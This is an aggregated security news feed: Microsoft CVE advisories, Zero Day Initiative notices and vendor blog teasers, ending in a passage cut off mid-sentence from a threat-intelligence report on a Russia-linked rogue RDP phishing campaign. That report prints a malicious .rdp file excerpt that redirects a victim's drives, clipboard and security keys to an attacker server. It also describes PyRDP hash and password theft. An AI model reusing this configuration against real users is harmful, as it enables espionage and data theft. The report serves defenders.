2025-04-08T07:00:00Z | 1744095600

Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29791
CVE-2025-27750 Microsoft Excel Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27750
CVE-2025-27752 Microsoft Excel Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27752
CVE-2025-27751 Microsoft Excel Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27751
CVE-2025-27743 Microsoft System Center Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Untrusted search path in System Center allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27743
CVE-2025-27749 Microsoft Office Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27749
CVE-2025-27747 Microsoft Word Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27747
CVE-2025-27748 Microsoft Office Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27748
CVE-2025-27746 Microsoft Office Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27746
CVE-2025-27745 Microsoft Office Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27745
CVE-2025-27742 NTFS Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Out-of-bounds read in Windows NTFS allows an unauthorized attacker to disclose information locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27742
CVE-2025-27744 Microsoft Office Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Improper access control in Microsoft Office allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27744
CVE-2025-27741 NTFS Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27741
CVE-2025-27740 Active Directory Certificate Services Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Weak authentication in Windows Active Directory Certificate Services allows an authorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27740
CVE-2025-27479 Kerberos Key Distribution Proxy Service Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Insufficient resource pool in Windows Kerberos allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27479
CVE-2025-27478 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Heap-based buffer overflow in Windows Local Security Authority (LSA) allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27478
CVE-2025-27477 Windows Telephony Service Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27477
CVE-2025-27475 Windows Update Stack Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Sensitive data storage in improperly locked memory in Windows Update Stack allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27475
CVE-2025-27476 Windows Digital Media Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27476
CVE-2025-27474 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use of uninitialized resource in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27474
CVE-2025-27472 Windows Mark of the Web Security Feature Bypass Vulnerability
2025-04-08T07:00:00Z | 1744095600

Protection mechanism failure in Windows Mark of the Web (MOTW) allows an unauthorized attacker to bypass a security feature over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27472
CVE-2025-27473 HTTP.sys Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Uncontrolled resource consumption in Windows HTTP.sys allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27473
CVE-2025-27470 Windows Standards-Based Storage Management Service Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27470
CVE-2025-27471 Microsoft Streaming Service Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Sensitive data storage in improperly locked memory in Microsoft Streaming Service allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27471
CVE-2025-26688 Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Stack-based buffer overflow in Microsoft Virtual Hard Drive allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26688
CVE-2025-26687 Win32k Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows Win32K - GRFX allows an unauthorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26687
CVE-2025-26686 Windows TCP/IP Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Sensitive data storage in improperly locked memory in Windows TCP/IP allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26686
CVE-2025-26680 Windows Standards-Based Storage Management Service Denial of Service Vulnerability
2025-04-08T07:00:00Z | 1744095600

Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26680
CVE-2025-26681 Win32k Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows Win32K - GRFX allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26681
CVE-2025-26668 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Heap-based buffer overflow in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26668
CVE-2025-26667 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Exposure of sensitive information to an unauthorized actor in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26667
CVE-2025-26669 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Out-of-bounds read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26669
CVE-2025-26666 Windows Media Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Heap-based buffer overflow in Windows Media allows an authorized attacker to execute code locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26666
CVE-2025-26665 Windows upnphost.dll Elevation of Privilege Vulnerability
2025-04-08T07:00:00Z | 1744095600

Sensitive data storage in improperly locked memory in Windows upnphost.dll allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26665
CVE-2025-26664 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
2025-04-08T07:00:00Z | 1744095600

Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26664
CVE-2025-26663 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
2025-04-08T07:00:00Z | 1744095600

Use after free in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26663
The Future of SASE: Simplifying IT and Securing the Future
2025-04-08T06:54:47Z | 1744095287

SASE emerged to address the challenges of digital transformation, providing the means to connect and secure enterprise resources – sites, remote users, and cloud resources — through a single, global network and security stack.   The next phase of SASE will extend both its capabilities (what it delivers) and its delivery model (how it operates). AI... The post The Future of SASE: Simplifying IT and Securing the Future  appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-future-of-sase/
Safeguarding Patient Data with ZTNA: Modernizing Healthcare Security
2025-04-08T06:18:53Z | 1744093133

The post Safeguarding Patient Data with ZTNA: Modernizing Healthcare Security appeared first on Cato Networks.

https://www.catonetworks.com/resources/modernizing-healthcare-security/
ZDI-CAN-26605: Trend Micro
2025-04-08T05:00:00Z | 1744088400

A CVSS score 7.8 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Lays (@_L4ys) of TRAPA Security' was reported to the affected vendor on: 2025-04-08, 59 days ago. The vendor is given until 2025-08-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26914: Apple
2025-04-08T05:00:00Z | 1744088400

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-08, 59 days ago. The vendor is given until 2025-08-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26909: Apple
2025-04-08T05:00:00Z | 1744088400

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-08, 59 days ago. The vendor is given until 2025-08-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26594: Trend Micro
2025-04-08T05:00:00Z | 1744088400

A CVSS score 7.8 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Lays (@_L4ys) of TRAPA Security' was reported to the affected vendor on: 2025-04-08, 59 days ago. The vendor is given until 2025-08-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26609: Trend Micro
2025-04-08T05:00:00Z | 1744088400

A CVSS score 7.8 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Lays (@_L4ys) of TRAPA Security' was reported to the affected vendor on: 2025-04-08, 59 days ago. The vendor is given until 2025-08-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-25912: Siemens
2025-04-08T05:00:00Z | 1744088400

A CVSS score 6.5 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-08, 59 days ago. The vendor is given until 2025-08-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26915: Apple
2025-04-08T05:00:00Z | 1744088400

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-08, 59 days ago. The vendor is given until 2025-08-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
Security Alert (A25-04-07): Multiple Vulnerabilities in Android
2025-04-08T04:00:00Z | 1744084800

Google has released Android Security Bulletin April 2025 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
2025 Q2 Vulnerability Forecast
2025-04-08T00:30:00Z | 1744072200

We’re expecting 9006 +/- 1259 vulnerabilities this quarter, as we close out the year.

https://www.first.org/blog/20250408-Q2Vulnerability-Forecast
2025 Q2 Vulnerability Forecast
2025-04-08T00:30:00Z | 1744072200

We’re expecting 9006 +/- 1259 vulnerabilities this quarter, as we close out the year.

https://www.first.org/blog/20250408-Q2Vulnerability-Forecast
Private 5G networks (ITSAP.80.117)
2025-04-07T19:33:45Z | 1744054425

https://cyber.gc.ca/en/guidance/private-5g-networks-itsap80117
Märts küberruumis: vähem intsidente, rohkem sihitud ründeid
2025-04-07T17:20:40Z | 1744046440

Riigi Infosüsteemi Ameti (RIA) kuuülevaatest selgub, et märtsis 2025 registreeriti 533 mõjuga intsidenti – see on viimase poole aasta madalaim näitaja. Peamiselt panga- ja muude kasutajaandmete varastamiseks mõeldud õngitsuslehti avastati märtsis 185 ja erinevaid petulehti 105.

https://ria.ee/uudised/marts-kuberruumis-vahem-intsidente-rohkem-sihitud-rundeid
Product Energy Efficiency Is Good for Business
2025-04-07T13:33:03Z | 1744032783

The explosion of digital data, along with the growing adoption of artificial intelligence (AI)-powered applications, has created exciting opportunities for businesses in nearly every sector. At the same time, there is growing awareness of the high energy consumption of these technologies, prompting businesses to search...

https://www.netscout.com/blog/product-energy-efficiency-good-business
Cyber security advice for political candidates
2025-04-07T13:19:14Z | 1744031954

https://cyber.gc.ca/en/guidance/cyber-security-advice-political-candidates
Aryaka Featured in 2025 CRN® Partner Program Guide for Growing Investment and Driving Innovation in the Channel
2025-04-07T13:14:32Z | 1744031672

Santa Clara, CA, April 7, 2025 — Aryaka®, the leader in and first to deliver Unified SASE as a Service, today announced that it has been honored by CRN®, a brand of The Channel Company, with inclusion in the prestigious 2025 CRN Partner Program Guide. This annual guide is an essential resource for solution providers... The post Aryaka Featured in 2025 CRN® Partner Program Guide for Growing Investment and Driving Innovation in the Channel appeared first on Aryaka.

https://www.aryaka.com/press/aryaka-featured-in-2025-crn-partner-program-guide/
DDoS Attack Trends in 2024 Signify That Sophistication Overshadows Size
2025-04-07T12:00:00Z | 1744027200

https://www.akamai.com/blog/security/2025/apr/ddos-attack-trends-2024-signify-sophistication-overshadows-size
Windows Remote Desktop Protocol: Remote to Rogue
2025-04-07T10:00:00Z | 1744020000

Written by: Rohit Nambiar Executive Summary In October 2024, Google Threat Intelligence Group (GTIG) observed a novel phishing campaign targeting European government and military organizations that was attributed to a suspected Russia-nexus espionage actor we track as UNC5837. The campaign employed signed .rdp file attachments to establish Remote Desktop Protocol (RDP) connections from victims' machines. Unlike typical RDP attacks focused on interactive sessions, this campaign creatively leveraged resource redirection (mapping victim file systems to the attacker servers) and RemoteApps (presenting attacker-controlled applications to victims). Evidence suggests this campaign may have involved the use of an RDP proxy tool like PyRDP to automate malicious activities like file exfiltration and clipboard capture. This technique has been previously dubbed as “Rogue RDP.” The campaign likely enabled attackers to read victim drives, steal files, capture clipboard data (including passwords), and obtain victim environment variables. While we did not observe direct command execution on victim machines, the attackers could present deceptive applications for phishing or further compromise. The primary objective of the campaign appears to be espionage and file theft, though the full extent of the attacker's capabilities remains uncertain. This campaign serves as a stark reminder of the security risks associated with obscure RDP functionalities, underscoring the importance of vigilance and proactive defense. Introduction Remote Desktop Protocol (RDP) is a legitimate Windows service that has been well researched by the security community. However, most of the security community’s existing research is focused on the adversarial use of RDP to control victim machines via interactive sessions.  This campaign included use of RDP that was not focused on interactive control of victim machines. Instead, adversaries leveraged two lesser-known features of the RDP protocol to present an application (the nature of which is currently unknown) and access victim resources. Given the low prevalence of this tactic, technique, and procedure (TTP) in previous reporting, we seek to explore the technical intricacies of adversary tradecraft abusing the following functionality of RDP: RDP Property Files (.rdp configuration files) Resource redirection (e.g. mapping victim file systems to the RDP server) RemoteApps (i.e. displaying server-hosted applications to victim) Additionally, we will shed light on PyRDP, an open-source RDP proxy tool that offers attractive automation capabilities to attacks of this nature. By examining the intricacies of the tradecraft observed, we gain not only a better understanding of existing campaigns that have employed similar tradecraft, but of attacks that may employ these techniques in the future. Campaign Operations This campaign tracks a wave of suspected Russian espionage activity targeting European government and military organizations via widespread phishing. Google Threat Intelligence Group (GTIG) attributes this activity to a suspected Russia-nexus espionage actor group we refer to as UNC5837. The Computer Emergency Response Team of Ukraine (CERT-UA) reported this campaign on Oct. 29, 2024, noting the use of mass-distributed emails with.rdp file attachments among government agencies and other Ukrainian organizations. This campaign has also been documented by Microsoft, TrendMicro, and Amazon. The phishing email in the campaign claimed to be part of a project in conjunction with Amazon, Microsoft, and the Ukrainian State Secure Communications and Information Security Agency. The email included a signed .rdp file attachment purporting to be an application relevant to the described project. Unlike more common phishing lures, the email explicitly stated no personal data was to be provided and if any errors occurred while running the attachment, to ignore it as an error report would be automatically generated. Figure 1: Campaign email sample Executing the signed attachment initiates an RDP connection from the victim's machine. The attachment is signed with a Let’s Encrypt certificate issued to the domain the RDP connection is established with. The signed nature of the file bypasses the typical yellow warning banner, which could otherwise alert the user to a potential security risk. More information on signature-related characteristics of these files are covered in a later section. Figure 2: Unsigned RDP connection — warning banner The malicious .rdp configuration file specifies that, when executed, an RDP connection is initiated from the victim’s machine while granting the adversary read & write access to all victim drives and clipboard content. Additionally, it employs the RemoteApp feature, which presents a deceptive application titled "AWS Secure Storage Connection Stability Test" to the victim's machine. This application, hosted on the attacker's RDP server, masquerades as a locally installed program, concealing its true, potentially malicious nature. While the application's exact purpose remains undetermined, it may have been used for phishing or to trick the user into taking action on their machine, thereby enabling further access to the victim's machine.  Further analysis suggests the attacker may have used an RDP proxy tool like PyRDP (examined in later sections), which could automate malicious activities such as file exfiltration and clipboard capture, including potentially sensitive data like passwords. While we cannot confirm the use of an RDP proxy tool, the existence, ease of accessibility, and functionalities offered by such a tool make it an attractive option for this campaign. Regardless of whether such a tool was used or not, the tool is bound to the permissions granted by the RDP session. At the time of writing, we are not aware of an RDP proxy tool that exploits vulnerabilities in the RDP protocol, but rather gives enhanced control over the established connection.  The techniques seen in this campaign, combined with the complexity of how they interact with each other, make it tough for incident responders to assess the true impact to victim machines. Further, the number of artifacts left to perform post-mortem are relatively small, compared to other attack vectors. Because existing research on the topic is speculative regarding how much control an attacker has over the victim, we sought to dive deeper into the technical details of the technique components. While full modi operandi cannot be conclusively determined, UNC5837’s primary objective appears to be espionage and file stealing. Deconstructing the Attack: A Deep Dive into RDP Techniques Remote Desktop Protocol The RDP is used for communication between the Terminal Server and Terminal Server Client. RDP works with the concept of “virtual channels” that are capable of carrying presentation data, keyboard/mouse activity, clipboard data, serial device information, and more. Given these capabilities, as an attack vector, RDP is commonly seen as a route for attackers in possession of valid victim credentials to gain full graphical user interface (GUI) access to a machine. However, the protocol supports other interesting capabilities that can facilitate less conventional attack techniques. RDP Configuration Files RDP has a number of properties that can be set to customize the behavior of a remote session (e.g., IP to connect to, display settings, certificate options). While most are familiar with configuring RDP sessions via a traditional GUI (mstsc.exe), these properties can also be defined in a configuration file with the .rdp extension which, when executed, achieves the same effect. The following .rdp file was seen as an email attachment (SHA256): ba4d58f2c5903776fe47c92a0ec3297cc7b9c8fa16b3bf5f40b46242e7092b46 An excerpt of this .rdp file is displayed in Figure 3 with annotations describing some of the configuration settings. # Connection information alternate full address:s:eu-southeast-1-aws[.]govtr[.]cloud full address:s:eu-southeast-1-aws[.]govtr[.]cloud # Resource Redirection drivestoredirect:s:* redirectprinters:i:1 redirectcomports:i:1 redirectsmartcards:i:1 redirectwebauthn:i:1 redirectclipboard:i:1 redirectposdevices:i:1 # RemoteApp Config remoteapplicationicon:s:C:\Windows\SystemApps\Microsoft.Windows. SecHealthUI_cw5n1h2txyewy\Assets\Health.contrast-white.ico remoteapplicationmode:i:1 remoteapplicationname:s:AWS Secure Storage Connection Stability Test v24091285697854 remoteapplicationexpandcmdline:i:0 remoteapplicationcmdline:s:%USERPROFILE% %COMPUTERNAME% %USERDNSDOMAIN% remoteapplicationprogram:s:||AWS Secure Storage Connection Stability Test v24091285697854 # Certificate Signing signature:s:AQABAAEAAABIDgAAMIIORAYJKoZIhvcNAQcCoIIONTCCDj ECAQExDzANBglghkgB ZQMEAgEFADALBgkqhkiG9w0BBwGggg1VMIID hzCCAw2gAwIBAgISBAM9zxvijMss qZQ1HI92Q29iMAoGCCqGSM49BA MDMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1M ZXQncyBFbmNye XB0MQswCQYDVQQDEwJFNTAeFw0yNDA5MjUxMzM1MjRaFw0yNDEy MjQxMzM1MjNaMBYxFDASBgNVBAMTC2dvdnRyLmNsb3VkMFkwEwY HKoZIzj0CAQYI KoZIzj0DAQcDQgAE9QvXN8RVmfGSaJf0nPJcFoWu8N whtD2/MJa+0N6k+7pn5XxS 2s74CVZ6alzVJhuRh3711HkOJ/NDZ1HgA 0IGtaOCAh0wggIZMA4GA1UdDwEB/wQE AwIHgDAdBgNVHSUEFjAUBg grBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH/BAIw ADAdBgNVHQ 4EFgQUmlyAvqbyzuGLNNsbP3za+WwgrfwwHwYDVR0jBBgwFoAUnytf zzwhT50Et+0rLMTGcIvS1w0wVQYIKwYBBQUHAQEESTBHMCEGCCsG AQUFBzABhhVo dHRwOi8vZTUuby5sZW5jci5vcmcwIgYIKwYBBQUHM AKGFmh0dHA6Ly9lNS5pLmxl bmNyLm9yZy8wJQYDVR0RBB4wHIINK i5nb3Z0ci5jbG91ZIILZ292dHIuY2xvdWQw EwYDVR0gBAwwCjAIBgZng QwBAgEwggEFBgorBgEEAdZ5AgQCBIH2BIHzAPEAdwBI sONr2qZHNA/ lagL6nTDrHFIBy1bdLIHZu7+rOdiEcwAAAZIpml1hAAAEAwBIMEYC IQCpE8FeX9O+aQZBuhg0LrUcIpfZx9pojamHrrov9YJjSQIhAKBBEO2sSlX3Wxau c7p/xhzOfesiX4DnuCk57t... Figure 3: .rdp file excerpt When executed, this configuration file initiates an RDP connection to the malicious command-and-control (C2 or C&C) server eu-southeast-1-aws[.]govtr[.]cloud and redirects all drives, printers, COM ports, smart cards, WebAuthn requests (e.g., security key), clipboard, and point-of-sale (POS) devices to the C2 server. The remoteapplicationmode parameter being set to 1 will switch the session from the “traditional” interactive GUI session to instead presenting the victim with only a part (application) of the RDP server. The RemoteApp, titled AWS Secure Storage Connection Stability Test v24091285697854, resides on the RDP server and is presented to the victim in a windowed popup. The icon used to represent this application (on the Windows taskbar for example) is defined by remoteapplicationicon. Windows environment variables %USERPROFILE%, %COMPUTERNAME%, and %USERDNSDOMAIN% are used as command-line arguments to the application. Due to the use of the property remoteapplicationexpandcmdline:i:0 , the Windows environment variables sent to the RDP server will be that of the client (aka victim), effectively performing initial reconnaissance upon connection. Lastly, the signature property defines the encoded signature that signs the .rdp file. The signature used in this case was generated using Let’s Encrypt. Interestingly, the SSL certificate used to sign the file is issued for the domain the RDP connection is made to. For example, with SHA256: 1c1941b40718bf31ce190588beef9d941e217e6f64bd871f7aee921099a9d881. Figure 4: Signature property within .rdp file Tools like rdp_holiday can be used to decode the public certificate embedded within the file in Figure 4. Figure 5: .rdp file parsed by rdp_holiday The certificate is an SSL certificate issued for the domain the RDP connection is made to. This can be correlated with the RDP properties full_address / alternate_full_address. alternate full address:s:eu-north-1-aws.ua-gov.cloud full address:s:eu-north-1-aws.ua-gov.cloud Figure 6: Remote Address RDP Proprties .rdp files targeting other victims also exhibited similar certificate behavior. In legitimate scenarios, an organization could sign RDP connections with SSL certificates tied to their organization’s certificate authority. Additionally, an organization could also disable execution of .rdp files from unsigned and unknown publishers. The corresponding GPO can be found under Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client -> Allow .rdp files from unknown publishers. Figure 7: GPO policy for disabling unknown and unsigned .rdp file execution The policy in Figure 7 can optionally further be coupled with the “Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers” policy (within the same location) to add certificates as Trusted Publishers. From an attacker’s perspective, existence of a signature allows the connection prompt to look less suspicious (i.e., without the usual yellow warning banner), as seen in Figure 8. Figure 8: Connection prompt (source) This RDP configuration approach is especially notable because it maps resources from both the adversary and victim machines:  This RemoteApp being presented resides on the adversary-controlled RDP server, not the client/victim machine.  The Windows environment variables are that of the client/victim that are forwarded to the RDP server as command-line arguments Victim file system drives are forwarded and accessible as remote shares on the RDP server. Only the drives accessible to the victim-user initiating the RDP connection are accessible to the RDP server. The RDP server by default has the ability to read and write to the victim’s file system drives Victim clipboard data is accessible to the RDP server. If the victim machine is running within a virtualized environment but shares its clipboard with the host machine in addition to the guest, the host’s clipboard will also be forwarded to the RDP server. Keeping track of what activity happens on the victim and on the server in the case of an attacker-controlled RDP server helps assess the level of control the attacker has over the victim machine. A deeper understanding of the RDP protocol's functionalities, particularly those related to resource redirection and RemoteApp execution, is crucial for analyzing tools like PyRDP. PyRDP operates within the defined parameters of the RDP protocol, leveraging its features rather than exploiting vulnerabilities. This makes understanding the nuances of RDP essential for comprehending PyRDP's capabilities and potential impact.  More information on RDP parameters can be found here and here. Resource Redirection The campaign’s .rdp configuration file set several RDP session properties for the purpose of resource redirection.  RDP resource redirection enables the utilization of peripherals and devices connected to the local system within the remote desktop session, allowing access to resources such as: Printers Keyboards, mouse Drives (hard drives, CD/DVD drives, etc.) Serial ports Hardware keys like Yubico (via smartcard and WebAuthn redirection) Audio devices Clipboards (for copy-pasting between local and remote systems) Resource redirection in RDP is facilitated through Microsoft's "virtual channels." The communication happens via special RDP packets, called protocol data packets (PDU), that mirror changes between the victim and attacker machine as long as the connection is active. More information on virtual channels and PDU structures can be found in MS-RDPERP. Typically, virtual channels employ encrypted communication streams. However, PyRDP is capable of capturing the initial RDP handshake sequences and hence decrypting the RDP communication streams. Figure 9: Victim’s mapped-drives as seen on an attacker’s RDP server Remote Programs / RemoteApps RDP has an optional feature called RemoteApp programs, which are applications (RemoteApps) hosted on the remote server that behave like a windowed application on the client system, which in this case is a victim machine. This can make a malicious remote app seem like a local application to the victim machine without ever having to touch the victim machine’s disk.  Figure 10 is an example of the MS Paint application presented as a RemoteApp as seen by a test victim machine. The application does not exist on the victim machine but is presented to appear like a native application. Notice how there is no banner/top dock that indicates an RDP connection one would expect to see in an interactive session. The only indicator appears to be the RDP symbol on the taskbar. Figure 10: RDP RemoteApp (MsPaint.exe) hosted on the RDP server, as seen on a test victim machine All resources used by RemoteApp belong to that of the RDP server. Additionally, if victim drives are mapped to the RDP server, they are accessible by the RemoteApp as well. PyRDP While the use of a tool like PyRDP in this campaign cannot be confirmed, the automation capabilities it offers make it an attractive option worth diving deeper into. A closer look at PyRDP will illuminate how such a tool could be useful in this context. PyRDP is an open-source, Python-based, man-in-the-middle (MiTM) RDP proxy toolkit designed for offensive engagements. Figure 11: PyRDP as a MiTM tool PyRDP operates by running on a host (MiTM server) and pointing it to a server running Windows RDP. Victims connect to the MiTM server with no indication of being connected to a relay server, while PyRDP seamlessly relays the connection to the final RDP server while providing enhanced capabilities over the connection, such as: Stealing NTLM hashes of the credentials used to authenticate to the RDP server Running commands on the RDP server after the user connects Capturing the user’s clipboard Enumerating mapped drives Stream, record (video format), and session takeover It’s important to note that, from our visibility, PyRDP does not exploit vulnerabilities or expose a new weakness. Instead, PyRDP gives granular control to the functionalities native to the RDP protocol. Password Theft PyRDP is capable of stealing passwords, regardless of whether Network Level Authentication (NLA) is enabled. In the case NLA is enabled, it will capture the NTLM hash via the NLA as seen in Figure 12. It does so by interrupting the original RDP connection sequence and completing part of it on its own, thereby allowing it to capture hashed credentials. The technique works in a similar way to Responder. More information about how PyRDP does this can be found here. Figure 12: RDP server user NTLMv2 Hashes recorded by PyRDP during user authentication Alternatively, if NLA is not enabled, PyRDP attempts to scan the codes it receives when a user tries to authenticate and convert them into virtual key codes, thereby "guessing" the supplied password. The authors of the tool refer to this as their “heuristic method” of detecting passwords. Figure 13: Plaintext password detection without NLA When the user authenticates to the RDP server, PyRDP captures these credentials used to login to the RDP server. In the event the RDP server is controlled by the adversary (e.g., in this campaign), this feature does not add much impact since the credentials captured belong to the actor-controlled RDP server. This capability becomes impactful, however, when an attacker attempts an MiTM attack where the end server is not owned by them. It is worth noting that during setup, PyRDP allows credentials to be supplied by the attacker. These credentials are then used to authenticate to the RDP server. By doing so, the user does not need to be prompted for credentials and is directly 